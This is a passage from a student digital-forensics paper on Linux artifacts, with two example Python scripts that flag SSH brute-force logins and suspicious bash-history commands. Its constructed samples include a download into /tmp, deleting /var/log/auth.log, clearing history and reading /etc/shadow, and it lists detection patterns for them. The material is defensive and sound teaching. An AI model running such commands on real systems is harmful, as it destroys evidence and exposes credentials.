Unit 8 Assignment
IT411 Digital Forensics Eric Clarkson
Purdue Global University
Professor Louay Karadsheh October 17, 2023
What are some of the things that you can learn from the forensic artifacts from a Linux system? How can they be used to help piece together the puzzle after a breach has occurred?
To investigate security incidents and uncover system vulnerabilities, digital forensic investigators employ several methodologies and tools. Forensic artifacts made by Linux systems are one of the most potent sources of information. After a breach, these artifacts can help investigators piece together the puzzle by offering significant information about system activities, user behavior, and potential security risks.
Forensic artifacts created from Linux systems can reveal important information about system activity, user behavior, and potential security breaches. These artifacts can be utilized to investigate security incidents, discover system flaws, and track user behavior. This paper looks at some of the most important forensic artifacts that may be obtained from a Linux system, as well as how they can be used to investigate security issues.
When investigating a Linux system, system logs are among the most important artifacts to collect. They keep a record of system events such as user logins, kernel and service messages, and application activity. System logs usually reside in the /var/log/ directory and can be examined with the 'dmesg' and 'journalctl' commands. System log analysis can assist in identifying potential security events such as failed login attempts or unauthorized access to critical information.
Digital forensic investigators can uncover unusual actions that may have led to the security issue by reviewing system logs. They can, for example, look for indications of brute-force attacks, unauthorized access attempts, or changes to system settings that may have exposed vulnerabilities.
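As an added illustration of the log review described above (this is example code written for this paper, not a tool from the course), the script below parses constructed sshd and sudo lines in the syslog format found in /var/log/auth.log or /var/log/secure, counts failed password attempts per source address, flags sources that exceed a threshold, and notes any account that was accepted from such a source after the failures. The host name, addresses, user names and timestamps are all made up for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in the syslog format used by /var/log/auth.log
# (Debian/Ubuntu) or /var/log/secure (RHEL family). Hosts and users are fictional.
SAMPLE_AUTH_LOG = """\
Oct 17 09:12:01 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Oct 17 09:12:03 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 51023 ssh2
Oct 17 09:12:05 web01 sshd[2213]: Failed password for root from 203.0.113.5 port 51024 ssh2
Oct 17 09:12:07 web01 sshd[2215]: Failed password for root from 203.0.113.5 port 51025 ssh2
Oct 17 09:12:09 web01 sshd[2217]: Failed password for root from 203.0.113.5 port 51026 ssh2
Oct 17 09:12:12 web01 sshd[2219]: Accepted password for root from 203.0.113.5 port 51027 ssh2
Oct 17 09:30:44 web01 sshd[2301]: Failed password for eric from 198.51.100.7 port 40110 ssh2
Oct 17 09:30:50 web01 sshd[2301]: Accepted password for eric from 198.51.100.7 port 40110 ssh2
Oct 17 10:01:00 web01 sudo:     eric : TTY=pts/0 ; PWD=/home/eric ; USER=root ; COMMAND=/bin/cat /etc/shadow
"""

# sshd password events: "Failed password for [invalid user] NAME from A.B.C.D port N"
SSH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)
# sudo events: "sudo:  USER : ... COMMAND=/path/to/program args"
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*COMMAND=(?P<cmd>.+)$")


def parse_ssh_events(log_text):
    """Return one dict (result, user, src) per sshd password event, in file order."""
    events = []
    for line in log_text.splitlines():
        m = SSH_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def find_bruteforce(events, threshold=4):
    """Count failures per source address and report sources at or above threshold.

    For each flagged source, also list accounts for which an 'Accepted' event
    followed earlier failures from the same address: the pattern of a password
    guess that eventually worked, which deserves immediate attention.
    """
    failures = defaultdict(int)
    accepted_after = defaultdict(list)
    for ev in events:
        src = ev["src"]
        if ev["result"] == "Failed":
            failures[src] += 1
        elif failures[src] > 0 and ev["user"] not in accepted_after[src]:
            accepted_after[src].append(ev["user"])
    return {
        src: {"failures": n, "accepted_after_failures": accepted_after[src]}
        for src, n in failures.items()
        if n >= threshold
    }


def find_sudo_commands(log_text):
    """Extract (user, command) pairs from sudo log lines, e.g. reads of sensitive files."""
    return [
        (m.group("user"), m.group("cmd").strip())
        for m in map(SUDO_RE.search, log_text.splitlines())
        if m
    ]


if __name__ == "__main__":
    evts = parse_ssh_events(SAMPLE_AUTH_LOG)
    for src, info in find_bruteforce(evts).items():
        print(f"{src}: {info['failures']} failures, accepted after failures: {info['accepted_after_failures']}")
    for user, cmd in find_sudo_commands(SAMPLE_AUTH_LOG):
        print(f"sudo by {user}: {cmd}")
```

On the constructed sample the script flags 203.0.113.5 (five failures followed by an accepted root login) while leaving 198.51.100.7 alone, since a single typo before a successful login is normal user behaviour; the threshold is a tunable assumption, not a standard. On a real system the same parser can be fed the output of `journalctl -u ssh` or the auth log file directly.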
Another essential artifact to gather is Bash history, which shows what commands were run on the system and by whom. Bash history is saved in the .bash_history file in the user's home directory. The bash history can be used to follow a user's activities and discover any suspicious or malicious commands that were run. This data can be utilized to identify insider risks as well as externally perpetrated attacks.
By examining bash history, digital forensic investigators can uncover any unusual or malicious behavior that may have contributed to the security problem. They can also detect attempts to conceal illicit activity, such as deleting bash history files or running commands to wipe logs.
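To show how the bash history review described above can be done systematically, here is an added example (written for this paper, not part of any course material) that parses a constructed .bash_history file recorded with HISTTIMEFORMAT set, so each command is preceded by a "#<epoch seconds>" line, and flags commands that match a few patterns for clearing history, removing or truncating logs, and downloading files into /tmp. The history content, user and address are fictional, and the pattern list is a starting point rather than a complete signature set.

```python
import re
from datetime import datetime, timezone

# Constructed ~/.bash_history for a hypothetical user. With HISTTIMEFORMAT set,
# bash writes a "#<epoch>" line before each command, which gives a timeline.
SAMPLE_BASH_HISTORY = """\
#1697532720
ls -la /var/www
#1697532790
cat /etc/passwd
#1697532850
wget http://203.0.113.5/update.tar.gz -O /tmp/update.tar.gz
#1697532900
tar xzf /tmp/update.tar.gz -C /tmp
#1697533020
rm -f /var/log/auth.log
#1697533030
history -c
"""

# (label, pattern) pairs; the first match wins for a given command.
SUSPICIOUS_PATTERNS = [
    ("history cleared", re.compile(r"^\s*history\s+-c\b")),
    ("history file removed", re.compile(r"\b(rm|shred|unlink)\b.*\.bash_history")),
    ("log file removed or truncated", re.compile(r"(\b(rm|shred|truncate)\b.*|>\s*)/var/log/")),
    ("download to /tmp", re.compile(r"\b(wget|curl)\b.*\s/tmp/")),
]


def parse_history(text):
    """Return (timestamp or None, command) pairs; timestamps are UTC datetimes."""
    entries = []
    pending_ts = None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            # Timestamp line written by bash when HISTTIMEFORMAT is set.
            pending_ts = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        if line.strip():
            entries.append((pending_ts, line))
            pending_ts = None  # a timestamp applies only to the next command
    return entries


def flag_suspicious(entries):
    """Return (iso_timestamp or None, label, command) for each flagged command."""
    hits = []
    for ts, cmd in entries:
        for label, pat in SUSPICIOUS_PATTERNS:
            if pat.search(cmd):
                hits.append((ts.isoformat() if ts else None, label, cmd))
                break
    return hits


if __name__ == "__main__":
    for when, label, cmd in flag_suspicious(parse_history(SAMPLE_BASH_HISTORY)):
        print(f"{when}  {label:32}  {cmd}")
```

The timeline matters as much as the matches: in the sample, the log removal and history clearing come minutes after a download into /tmp, which is the sequence an investigator would correlate against the system logs from the same window. Because a user can disable or clear history, an empty or unusually short .bash_history for an active account is itself worth noting.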
Network activity can also be utilized to detect unusual activity like network scans and other potential security concerns. Netstat, tcpdump, and Wireshark are among the tools available in Linux for monitoring network activities. Analyzing network activity can assist in identifying